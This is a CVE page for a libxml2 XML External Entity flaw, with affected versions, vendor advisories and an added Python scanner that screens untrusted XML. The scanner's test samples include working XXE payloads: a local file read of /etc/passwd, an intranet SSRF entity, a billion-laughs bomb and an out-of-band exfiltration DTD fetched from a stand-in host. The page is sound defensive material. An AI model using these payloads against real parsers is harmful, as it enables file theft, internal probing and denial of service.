CVE-2013-0339

Published: 21/01/2014 Updated: 07/11/2023
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 605
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

libxml2 up to and including 2.9.1 does not properly handle external entities expansion unless an application developer uses the xmlSAX2ResolveEntity or xmlSetExternalEntityLoader function, which allows remote malicious users to cause a denial of service (resource consumption), send HTTP requests to intranet servers, or read arbitrary files via a crafted XML document, aka an XML External Entity (XXE) issue. NOTE: it could be argued that because libxml2 already provides the ability to disable external entity expansion, the responsibility for resolving this issue lies with application developers; according to this argument, this entry should be REJECTed and each affected application would need its own CVE.
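The summary names three consequences of uncontrolled entity expansion: resource consumption, HTTP requests to intranet hosts, and arbitrary file reads. The scanner below is an added example, not code from this page, from libxml2 or from Vulmon; it shows what each of those primitives looks like in a document and rejects untrusted XML that carries one before any parser sees it. In libxml2 itself the controls are the parser options (do not pass XML_PARSE_NOENT or XML_PARSE_DTDLOAD for untrusted input, and pass XML_PARSE_NONET) or a refusing entity loader installed with xmlSetExternalEntityLoader, as the summary notes; a pre-parse gate like this is defence in depth for applications that cannot audit every parser call. Its regular expressions are a heuristic rather than a conforming DTD parser, the 1,000,000-character expansion limit is an assumed policy value, the default policy rejects any DTD at all since most applications need none, and every sample document (including the RFC 1918 and TEST-NET addresses in them) is constructed for the example.

```python
"""Pre-parse screen for XML External Entity (XXE) constructs, standard library only. Added example
for this CVE page, not libxml2 or Vulmon code: a gate to run on untrusted XML before any parser."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

QUOTED = r"[\"'][^\"']*[\"']"                    # one quoted literal (heuristic: no mixed quotes)
EXT_ID = rf"(?:SYSTEM|PUBLIC)\s+(?:{QUOTED}\s+)?[\"'](?P<uri>[^\"']*)[\"']"
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!DOCTYPE root SYSTEM "uri"> / PUBLIC "pubid" "uri": the external subset itself is fetched
EXTERNAL_DTD_RE = re.compile(rf"<!DOCTYPE\s+[^\s\[>]+\s+{EXT_ID}", re.IGNORECASE)
# <!ENTITY name "value"> | <!ENTITY name SYSTEM "uri"> | <!ENTITY % name ...> (parameter entity)
ENTITY_RE = re.compile(rf"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
                       rf"(?:{EXT_ID}|[\"'](?P<value>[^\"']*)[\"'])", re.IGNORECASE)
REF_RE = re.compile(r"&([A-Za-z_:][\w.:-]*);")
EFFECT = {"": "local file read", "file": "local file read", "http": "outbound request (SSRF)",
          "https": "outbound request (SSRF)", "ftp": "outbound request (SSRF)"}

@dataclass
class ScanResult:
    findings: list = field(default_factory=list)   # (rule, detail) pairs; any finding => reject
    expansion_chars: int = 0                       # size the body's entity references expand to
    @property
    def rejected(self):
        return bool(self.findings)

    def rules(self):
        return {rule for rule, _ in self.findings}

def _split_doctype(doc):
    # returns (doctype, body); a '[' before the first '>' opens an internal subset ending at ']>'
    m = DOCTYPE_RE.search(doc)
    if not m:
        return "", doc
    close, bracket = doc.find(">", m.end()), doc.find("[", m.end())
    if bracket != -1 and (close == -1 or bracket < close):
        end = doc.find("]>", bracket)
        end = len(doc) if end == -1 else end + 2
    else:
        end = len(doc) if close == -1 else close + 1
    return doc[m.start():end], doc[end:]

def _classify(uri):
    scheme = urlparse(uri).scheme.lower()
    return EFFECT.get(scheme, f"{scheme}: handler (parser-specific)")

def _expanded_size(name, entities, memo, stack):
    # characters produced by fully expanding &name; through the internal entities
    if name in memo:
        return memo[name]
    if name in stack:
        raise RecursionError(name)              # entity refers to itself; XML forbids this
    stack.add(name)
    value, total, pos = entities.get(name, ""), 0, 0   # predefined/undefined entity: counts as nothing
    for ref in REF_RE.finditer(value):
        total += ref.start() - pos + _expanded_size(ref.group(1), entities, memo, stack)
        pos = ref.end()
    stack.discard(name)
    memo[name] = total + len(value) - pos
    return memo[name]

def scan_xml(doc, allow_doctype=False, max_expansion=1_000_000):
    result = ScanResult()
    doctype, body = _split_doctype(doc)
    if not doctype:
        return result
    if not allow_doctype:
        result.findings.append(("doctype", "document declares a DTD"))
    if ext := EXTERNAL_DTD_RE.match(doctype):
        result.findings.append(("external-dtd", f"{_classify(ext['uri'])}: {ext['uri']}"))
    internal, memo = {}, {}
    for m in ENTITY_RE.finditer(doctype):
        if m["param"]:
            result.findings.append(("parameter-entity", f"%{m['name']}; (out-of-band exfiltration primitive)"))
        elif m["uri"] is not None:
            result.findings.append(("external-entity", f"&{m['name']}; -> {_classify(m['uri'])}: {m['uri']}"))
        else:
            internal[m["name"]] = m["value"]
    try:
        for ref in REF_RE.finditer(body):
            result.expansion_chars += _expanded_size(ref.group(1), internal, memo, set())
    except RecursionError as exc:
        result.findings.append(("recursive-entity", f"&{exc}; refers to itself"))
    if result.expansion_chars > max_expansion:
        result.findings.append(("entity-expansion", f"{result.expansion_chars:,} chars from a {len(body)}-byte body"))
    return result

# Constructed samples: the three impacts the CVE summary names, an out-of-band variant, two benign controls.
# Billion laughs: nine levels of ten-fold internal-entity expansion, so &lol9; expands to 3 * 10**9 chars.
LAUGHS = ['<!ENTITY lol "lol">'] + [f'<!ENTITY lol{i} "{"&lol%s;" % (i - 1 or "") * 10}">' for i in range(1, 10)]
SAMPLES = {
    "file_read": '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
    "intranet_ssrf": '<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/admin">]><r>&xxe;</r>',
    "billion_laughs": f"<!DOCTYPE r [{''.join(LAUGHS)}]><r>&lol9;</r>",
    "oob_exfil": '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://203.0.113.7/evil.dtd"> %dtd;]><r/>',
    "benign": "<r><a>1</a></r>",
    "internal_only": '<!DOCTYPE r [<!ENTITY c "Copyright">]><r>&c;</r>',
}
```

scan_xml(doc) returns a ScanResult whose findings explain the rejection: for the constructed samples, file_read is flagged as an external entity resolving to a local file read, intranet_ssrf as an outbound request, billion_laughs for 3,000,000,000 characters of expansion from a body of a few bytes, oob_exfil for its parameter entity, and internal_only is accepted only when the caller passes allow_doctype=True. The expansion estimate is computed without ever materialising the expanded text, which is the point: the gate must not itself be vulnerable to the resource-consumption attack it screens for.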

Vulnerable Products

xmlsoft libxml2 (unversioned entry; the summary covers releases up to and including 2.9.1)
xmlsoft libxml2 1.7.0
xmlsoft libxml2 1.7.1
xmlsoft libxml2 1.7.2
xmlsoft libxml2 1.7.3
xmlsoft libxml2 1.7.4
xmlsoft libxml2 1.8.0
xmlsoft libxml2 1.8.1
xmlsoft libxml2 1.8.2
xmlsoft libxml2 1.8.3
xmlsoft libxml2 1.8.4
xmlsoft libxml2 1.8.5
xmlsoft libxml2 1.8.6
xmlsoft libxml2 1.8.7
xmlsoft libxml2 1.8.9
xmlsoft libxml2 1.8.10
xmlsoft libxml2 1.8.13
xmlsoft libxml2 1.8.14
xmlsoft libxml2 1.8.16
xmlsoft libxml2 2.0.0
xmlsoft libxml2 2.1.0
xmlsoft libxml2 2.1.1
xmlsoft libxml2 2.2.0
xmlsoft libxml2 2.2.1
xmlsoft libxml2 2.2.2
xmlsoft libxml2 2.2.3
xmlsoft libxml2 2.2.4
xmlsoft libxml2 2.2.5
xmlsoft libxml2 2.2.6
xmlsoft libxml2 2.2.7
xmlsoft libxml2 2.2.8
xmlsoft libxml2 2.2.9
xmlsoft libxml2 2.2.10
xmlsoft libxml2 2.2.11
xmlsoft libxml2 2.3.0
xmlsoft libxml2 2.3.1
xmlsoft libxml2 2.3.2
xmlsoft libxml2 2.3.3
xmlsoft libxml2 2.3.4
xmlsoft libxml2 2.3.5
xmlsoft libxml2 2.3.6
xmlsoft libxml2 2.3.7
xmlsoft libxml2 2.3.8
xmlsoft libxml2 2.3.9
xmlsoft libxml2 2.3.10
xmlsoft libxml2 2.3.11
xmlsoft libxml2 2.3.12
xmlsoft libxml2 2.3.13
xmlsoft libxml2 2.3.14
xmlsoft libxml2 2.4.1
xmlsoft libxml2 2.4.2
xmlsoft libxml2 2.4.3
xmlsoft libxml2 2.4.4
xmlsoft libxml2 2.4.5
xmlsoft libxml2 2.4.6
xmlsoft libxml2 2.4.7
xmlsoft libxml2 2.4.8
xmlsoft libxml2 2.4.9
xmlsoft libxml2 2.4.10
xmlsoft libxml2 2.4.11
xmlsoft libxml2 2.4.12
xmlsoft libxml2 2.4.13
xmlsoft libxml2 2.4.14
xmlsoft libxml2 2.4.15
xmlsoft libxml2 2.4.16
xmlsoft libxml2 2.4.17
xmlsoft libxml2 2.4.18
xmlsoft libxml2 2.4.19
xmlsoft libxml2 2.4.20
xmlsoft libxml2 2.4.21
xmlsoft libxml2 2.4.22
xmlsoft libxml2 2.4.23
xmlsoft libxml2 2.4.24
xmlsoft libxml2 2.4.25
xmlsoft libxml2 2.4.26
xmlsoft libxml2 2.4.27
xmlsoft libxml2 2.4.28
xmlsoft libxml2 2.4.29
xmlsoft libxml2 2.4.30
xmlsoft libxml2 2.5.0
xmlsoft libxml2 2.5.4
xmlsoft libxml2 2.5.7
xmlsoft libxml2 2.5.8
xmlsoft libxml2 2.5.10
xmlsoft libxml2 2.5.11
xmlsoft libxml2 2.6.0
xmlsoft libxml2 2.6.1
xmlsoft libxml2 2.6.2
xmlsoft libxml2 2.6.3
xmlsoft libxml2 2.6.4
xmlsoft libxml2 2.6.5
xmlsoft libxml2 2.6.6
xmlsoft libxml2 2.6.7
xmlsoft libxml2 2.6.8
xmlsoft libxml2 2.6.9
xmlsoft libxml2 2.6.11
xmlsoft libxml2 2.6.12
xmlsoft libxml2 2.6.13
xmlsoft libxml2 2.6.14
xmlsoft libxml2 2.6.16
xmlsoft libxml2 2.6.17
xmlsoft libxml2 2.6.18
xmlsoft libxml2 2.6.20
xmlsoft libxml2 2.6.21
xmlsoft libxml2 2.6.22
xmlsoft libxml2 2.6.23
xmlsoft libxml2 2.6.24
xmlsoft libxml2 2.6.25
xmlsoft libxml2 2.6.26
xmlsoft libxml2 2.6.27
xmlsoft libxml2 2.6.28
xmlsoft libxml2 2.6.29
xmlsoft libxml2 2.6.30
xmlsoft libxml2 2.6.31
xmlsoft libxml2 2.6.32
xmlsoft libxml2 2.7.0
xmlsoft libxml2 2.7.1
xmlsoft libxml2 2.7.2
xmlsoft libxml2 2.7.3
xmlsoft libxml2 2.7.4
xmlsoft libxml2 2.7.5
xmlsoft libxml2 2.7.6
xmlsoft libxml2 2.7.7
xmlsoft libxml2 2.7.8
xmlsoft libxml2 2.8.0
xmlsoft libxml2 2.9.0
canonical ubuntu linux 10.04
canonical ubuntu linux 12.04
canonical ubuntu linux 12.10
canonical ubuntu linux 13.04
debian debian linux 6.0
debian debian linux 7.0
suse linux enterprise server 10

Vendor Advisories

Debian Bug report logs - #702260 libxml2: CVE-2013-0338 CVE-2013-0339. Package: libxml2; Maintainer for libxml2 is Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org>; Source for libxml2 is src:libxml2 (PTS, buildd, popcon). Reported by: Moritz Muehlenhoff <jmm@inutil.org>. Date: Mon, 4 Mar 2013 15:42: ...
Several security issues were fixed in libxml2 ...
USN-1904-1 introduced a regression in libxml2 ...
Brad Hill of iSEC Partners discovered that many XML implementations are vulnerable to external entity expansion issues, which can be used for various purposes such as firewall circumvention, disguising an IP address, and denial-of-service. libxml2 was susceptible to these problems when performing string substitution during entity expansion. For the ...